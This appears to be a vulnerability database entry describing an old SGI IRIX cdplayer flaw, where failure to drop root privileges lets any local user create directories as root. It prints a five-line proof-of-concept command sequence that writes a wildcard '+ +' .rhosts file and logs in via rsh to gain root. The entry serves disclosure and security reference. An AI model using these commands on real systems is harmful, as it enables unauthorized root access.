Lucene search
K

SGI IRIX <= 6.2 cdplayer Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 16 Views

SGI IRIX cdplayer vulnerability allows arbitrary users to gain root access via improper privilege managemen

Code

                                                source: http://www.securityfocus.com/bid/333/info

A vulnerability exists in the /usr/bin/X11/cdplayer application as shipped with SGI&#39;s IRIX operating system. By failing to shed root privileges, and creating arbitrary directories as root, cdplayer allows arbitrary users to gain root on the system.

The -dbcdir option to cdplayer specifies the directory to store information kept by cdplayer. This can be used to create arbitrary directories. By creating a directory belonging to an account whose home directory does not exist, creating a .rhosts file in this directory, and chowning the rhosts file to the account being attacked, any user on the system can obtain root status.

umask 000
cdplayer -dbcdir /usr/admin/
echo &#34;+ +&#34; &#62; /usr/admin/.rhosts
chown root.sys /usr/admin/.rhosts
rsh localhost -l sysadm 
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation